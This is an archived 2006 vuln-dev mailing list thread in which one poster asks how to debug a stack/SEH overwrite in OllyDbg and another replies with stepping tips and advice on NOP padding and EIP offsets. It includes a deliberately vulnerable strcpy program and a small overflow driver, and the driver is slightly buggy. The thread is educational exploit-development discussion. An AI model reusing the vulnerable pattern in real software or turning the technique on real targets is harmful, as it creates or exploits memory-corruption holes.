Nmap Security Scanner
*Intro
*Ref Guide
*Install Guide
*Download
*Changelog
*Book
*Docs
Security Lists
*Nmap Hackers
*Nmap Dev
*Bugtraq
*Full Disclosure
*Pen Test
*Basics
*More
Security Tools
*Pass crackers
*Sniffers
*Vuln Scanners
*Web scanners
*Wireless
*Exploitation
*Packet crafters
*More
Site News
Site Search:
Exploit World
Advertising
About/Contact
Credits
Sponsors:
edgeos



Vulnerability Development: Re: debugging seh overwrite

Re: debugging seh overwrite

From: Karma <karma_at_frij.com.au>
Date: Tue, 21 Mar 2006 19:22:18 +1100

Hey, my english isnt great either...

I am not an Ollydbg user but STEP OVER until your CALL STRCPY is reached,
then STEP INTO the strcpy function one level. Then you keep STEP OVER until
you see the RETN call from that function. You should see how your buffer
overwrite, in this case 41414141h overwrite EIP and possibly ESP too. If you
want to see the pointer be overwritten actually, you need to step into
function which possible has a rep mov in strcpy, I dont know where. But you
can see if you monitor destination of rep mov

Also in your case, I havent tried but you simply set EIP to 41414141h which

a. is not the stack address, likely causes segfault
b. is invalid opcode, no valid slide

Find offset of EIP using the crash, and use 90h as padding to try :)

Your code - memset(payload, 0x41, 80); \\ try 0x90
Your code - memcpy(payload+80, &ret, sizeof (int)); \\ yeah you need &ret
and you need to check offset at eip

Sorry if I misunderstand your question....

Karma

www.designfolks.com.au

----- Original Message -----
From: <laphoo_at_gmail.com>
To: <vuln-dev_at_securityfocus.com>
Sent: Monday, March 20, 2006 1:19 PM
Subject: debugging seh overwrite

Hello, I would like to know a way to debugging a vulnerable program, where I
am overwriting the se handler with my address. I have OllyDbg as just in
time debugger. If my exploit-buffer reaches the pointer to the next seh
record, nothing happens. Now I was trying to put breakpoint instructions
0xcc) as fake pointer but OllyDbg ignored them, or I did something wrong.
How is it possible to debug my vulnerable program with OllyDbg, to see where
and with which data I overwrote something?

/* cl expl.c (Visual C++ 6.0) */
#include <stdio.h>
#include <string.h>
int main (void)
{
    char *app[3];
    char payload[84];
    unsigned int ptr = 0xcccccccc;
    memset(payload, 0x00, sizeof payload);
    memset(payload, 0x41, 80);
    memcpy(payload+80, &ret, sizeof (int));
    app[0] = "vuln.exe";
    app[1] = payload;
    app[2] = NULL;
    execve(app[0], app, NULL);
    return 0;
}

/*vuln.c /
#include <stdio.h>
#include <string.h>
int main (int argc, char *argv[])
{
    char string[32];
    if (argc > 2)
    {
        printf("Usage: %s <string>\n", argv[0]);
        return 0;
    }
    strcpy(string, argv[1]);
    printf("%s", string);
    return 0;
}

Environment is Windows.XP.SP.2

I am sorry for my bad english.

Regards,
-- Laphoo
Received on Mar 22 2006

[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]
edgeos